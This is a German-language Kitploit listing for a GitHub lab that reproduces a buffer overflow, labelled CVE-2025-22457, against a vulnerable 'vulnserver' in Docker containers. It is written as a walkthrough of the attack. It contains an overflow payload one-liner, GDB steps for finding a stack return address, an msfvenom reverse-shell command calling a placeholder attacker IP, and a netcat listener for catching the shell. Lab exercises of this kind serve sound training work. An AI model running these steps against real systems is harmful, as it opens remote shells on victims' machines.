Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-22457-vulnserver-lab — Praktisches Labor zur Reproduktion von CVE-2025-22457: richtet Docker-Angreifer-/Opfer-Container ein, findet Stack-Adressen mit GDB und liefert einen msfvenom-Reverse-Shell-Exploit. | Kitploit
Tools/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeCTFPenetrationstestsLernen & BildungBinary-ExploitationLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

Praktisches Labor zur Reproduktion von CVE-2025-22457: richtet Docker-Angreifer-/Opfer-Container ein, findet Stack-Adressen mit GDB und liefert einen msfvenom-Reverse-Shell-Exploit.

Repository anzeigen
1vor 1 TagNoch nicht geprüft
Teilen

step 1 Umgebung einrichten

Berechtigungen & Ausführungsskript

Unter Windows kann man WSL verwenden, um es auszuführen

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

step 2: Dynamische Werte finden (manueller Schritt erforderlich)

Da Speicheradressen und IPs in verschiedenen Umgebungen dynamisch sind, müssen sie manuell gefunden und das exploit.py-Skript aktualisiert werden.

2.0 Zuerst zwei Attacker-Docker und einen Victim-Docker als Vorbereitung starten

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 stack_address finden (Rücksprungadresse)

Das Ziel dieses Schritts ist es, eine stabile Stack-Adresse zu finden, damit unsere Payload präzise dorthin springen kann.

1. Victim-Docker: GDB starten
root@kitploit:~
gdb ./vulnserver
2. Haltepunkt nach der strcpy-Funktion setzen
root@kitploit:~
(gdb) b strcpy
3. Programm ausführen, vulnserver beginnt zu lauschen
root@kitploit:~
(gdb) run

Haltepunkt auslösen: Verwende den Attacker-Docker und führe den folgenden Befehl aus, um eine Test-Payload zu senden. Dadurch bleibt GDB am Haltepunkt stehen. Hinweis: Ersetze <VICTIM_IP> durch die in Schritt 1 angezeigte Victim-IP.

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

Adresse finden und notieren: Kehre zum Terminal-Fenster zurück, in dem GDB läuft; das Programm sollte bereits angehalten haben. Führe den folgenden Befehl aus, um den Stack zu untersuchen:

root@kitploit:~
(gdb) x/200wx $esp

Suche in der Ausgabe nach einem Bereich, der aus 0x43434343 (steht für 'C') besteht. Wähle aus der Mitte dieses Bereichs eine beliebige Adresse (z. B. 0xffffd580) und kopiere sie. Das ist die stack_address.

2.2 exploit.py aktualisieren und buf (Shellcode) generieren

stack_address aktualisieren:

Aktualisiere mit einem Texteditor die stack_address in exploit.py auf die gerade kopierte Adresse

buf (Shellcode) generieren und aktualisieren:

Führe in der Shell des Attacker-Containers den msfvenom-Befehl aus, um den Shellcode zu generieren. Hinweis: Ersetze <ATTACKER_IP> durch die in Schritt 1 angezeigte Attacker-IP.

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

Kopiere den gesamten buf = b""...-Code aus der msfvenom-Ausgabe und ersetze damit vollständig den vorhandenen buf-Teil in der Datei exploit.py.

step 3 : Angriff ausführen

Listener starten: Führe in einem Shell-Fenster eines Attacker-Containers den folgenden Befehl aus, um den netcat-Listener zu starten.

root@kitploit:~
nc -lvnp 4444

Victim-Verbindung öffnen:

Es gibt zwei Methoden Methode 1

root@kitploit:~
./vulnserver

Methode 2

root@kitploit:~
gdb ./vulnserver
gef➤  run

Angriffsskript ausführen: Führe im Attacker-Docker die aktualisierte exploit.py aus. (Hinweis: Ersetze <victim_ip> durch die in Schritt 1 angezeigte Victim-IP)

root@kitploit:~
python3 exploit.py <victim_ip>

Ergebnis überprüfen: Wechsle zurück zum Fenster, in dem der netcat-Listener läuft. Wenn alles gut geht, sieht man eine aufgebaute Verbindung und erhält eine interaktive Shell. Du kannst Befehle wie whoami, ls -la eingeben, um es zu überprüfen.

step 4 : Umgebung bereinigen

GDB und Container beenden:

Gib in GDB quit ein und dann in der Container-Shell exit.

Mit den folgenden Befehlen können alle Container und Netzwerke gestoppt und bereinigt werden.

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
Tool herunterladen